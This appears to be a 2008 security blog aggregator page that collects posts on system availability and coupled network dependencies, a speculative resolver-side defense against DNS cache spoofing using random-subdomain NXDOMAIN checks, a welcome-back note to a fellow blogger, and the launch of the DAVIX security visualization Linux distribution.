Humans are in the loop, but not accounted for in this calculation. As I indicated in the human factor, the human can, in the case where redundant systems are properly designed and deployed, be the largest cause of down time (the keyboard-chair interface is non-redundant). Also, there is no consideration for the application itself (bugs, bad failed deployments) or consideration for the database (performance problems, bugs). As indicated in previous post, a poorly designed application that is down every week because of performance issues or bugs isn't going to magically have fewer failures because it is moved to redundant systems. It will just be a poorly designed, redundant application. 

Coupled Dependencies

 
availability-failedA quick note on coupled dependencies. In the example above, the design is such that the load balancer, firewall and router are coupled. (In this design they are, in other designs they are not). A hypothetical failure of the active firewall would result in a firewall failover, a load balancer failover, and perhaps a router HSRP failover. The MTTR would be the time it takes for all three devices to figure out who is active.
 
Coupled dependencies tend to cause unexpected outages themselves. Typically, when designing systems with coupled dependencies, thorough testing is needed to uncover unexpected interactions between the coupled devices. (In the case shown here interaction between HRSP, the routing protocol, the active/passive firewall, and layer 2 redundancy at the switch layer is complex enough to be worth a day in the lab.)
 
 
 

Conclusions

  • Structured System Management has the greatest influence on availability.
  • With non-redundant but well managed systems, the human factor will be significant, but should not be the major cause of outages.
  • With redundant, well managed systems, the human factor may be the largest cause of outages.
  • A poorly designed or written application will not be improved by redundancy.
 
Keep in mind that the combination of application, human and database outages, not considered in the calculation, will far outweigh simple hardware and operating system failures. For your estimations, you will have to add failures and recovery time for human failure, application failure and database failure. (Hint - figure a couple hours each per year.)
 
As indicated in the introductory post, I tried.
 
Back to the Introduction (or the previous post).

Using the DNS Question to Carry Randomness - a Temporary Hack? [Last In - First Out]

Posted: 14 Aug 2008 10:51 PM CDT

 

I read Mark Rothman's post Boiling the DNS Ocean. This lead me to a thought (just a thought), that somewhere within the existing DNS protocol, there has to be a way of introducing more randomness in the  DNS question and get that randomness back in the answer, simply to increase the probability that a resolver can trust an authoritative response. Of course having never written a resolver, I'm not qualified to analyze the problem -- but this being the blogosphere, that's not a reason to quit posting.

So at the risk of committing bloggo-suicide....Here goes......

Plan 'A' was to figure out if the unused bits in the ancount, nscount or ascount of the question could be used to send more random bits to the authoritative DNS. The ADNS would have to return those bits somewhere, and not in the same fields, because in the answer those bits are already used. Perhaps in an additional RR? It sounds hard to implement, and it would require that the ADNS and resolver both be upgraded. Try again.

Plan B is to use additional question records to send randomness from the resolver to the authoritative DNS, and figure out how to get them back.

Hmm…….How about using NXDOMAIN to carry the bits back to the resolver?

If I am a resolver, instead of asking one question (the one I want to know), I ask two questions, one that I want to know, and one that nobody knows, not even the authoritative DNS. Like perhaps asking for an A record made up of a long string of random bytes. Depending on the response, I can decide to trust or not trust the answer. Lets say that I need to know an A record for www.example.com. First  - I set qdcount=2, then in one request I ask example.com's NS's two questions:


Question 1: www.example.com
Question 2: longstringofrandombytes.example.com

If I get a valid response for the first question and an NXDOMAIN response for the second, I know that I've got a reply from a valid ADNS rather than a spoofed reply. An attacker spoofing the valid ADNS will not know the longstringofrandombytes part of the second question and cannot reasonably guess that string. The real ADNS will reply to the second question with either an NXDOMAIN error or a valid IP. If I get the NXDOMAIN error for the same longstringofrandombytes.example.com that I asked for, I'm good to go.

If the ADNS responds with a valid IP address or CNAME, I know that the DNS in question is doing NXDOMAIN re-writing or it has a wildcard. I can trust and cache that answer, annoying though it may be. If I get neither IP nor NXDOMAIN, the response is suspect.

From what I can see, which isn't very far, Plan B could be implemented by a resolver without any change to the upstream authoritative DNS. The upstream would just see a bunch of requests that it would reply to with NXDOMAIN. Heck - it probability is already seeing tons of those, with all the exploit attempts that likely are flying around. The resolver would have to either track the longstringofrandombytes that it sent for each question, or it would have to use some sort of hash/cookie to validate the bytes without storing or caching them for the duration of the round trip.

This is definitely an ugly hack, and I'm not even sure it would work.  It wouldn't make sense to use it for stub resolvers, it doesn't help man-in-the-middle attacks, and ADNS's would see increased load.  But  - there is no shared secret to manage as in TSIG, it doesn't require a top-down deployment like DNSSEC, and there is no protocol layer change (as far as I can figure out....) and there is no coordinated world wide deployment needed. Each operator can update one resolver at a time.
 
So am I smoking too much weed? Probably................my guess is that there is something I'm missing.

A bit of searching uncovered a similar concept being discussed at ietf org.

OK - I'm not the first one to dream this up. There is a difference though. That proposal is similar, but seems to have died, and from what I can tell, would require both ends of the transaction to be aware of the 'new plan'. That requirement makes that proposed too hard to implement as a short term solution.

Obviously the topic of short and a long term fixes for the DNS issue is already being discussed in circles where discussions like this actually matter. The problem is finding a solution that can be implemented on a wide scale, and per Vixie's summary of the conversation in the above link:

a solution here would be opportunistic and pairwise deployable, requiring
no flag days; it would require no new technical expertise for end users; it
would have only graceful failure modes; it would not be subject to downgrade
attacks; and ideally, it would require no new protocol development work.



The 'pairwise deployable' part  is still a problem. There are an awful lot of nameservers our there.



--Mike

Welcome back to My Friend, Alan Shimel [An Information Security Place]

Posted: 14 Aug 2008 09:57 PM CDT

I have two things to say:

1. Welcome back to the blogosphere Alan.  Great to have you back.

2. You people who screwed with him are filthy bastard racist cowards.

Vet

DAVIX 1.0.1 Officially Launched [iplosion security]

Posted: 14 Aug 2008 05:39 PM CDT

After months of building and testing, the long anticipated release of DAVIX - The Data Analysis & Visualization Linux® - arrived last week during Blackhat/DEFCON in Las Vegas. It is a very exiting moment for me and I am curious to see how the product is received by audience. So far the ISO image has been downloaded at least 600 times from our main distribution server. Downloads from the mirrors are not accounted.

Applied Security VisualizationAdditionally, Raffael Marty’s book Applied Security Visualization is now available in print. DAVIX was built with this particular book in mind. If you are looking for a methodology and not just a workable tool set, then the book is what you are looking for. The book covers all steps from the very basics to complete case studies and contains many hands-on examples. Therefore, the book together with DAVIX 1.0.1 is the perfect match for getting you started with security visualization. For a preview of the book’s content check out the rough cuts version.

All those eager to get their hands dirty immediately can find a description as well as the download links for the DAVIX ISO image on the DAVIX homepage. I wish you happy visualizing!

No comments: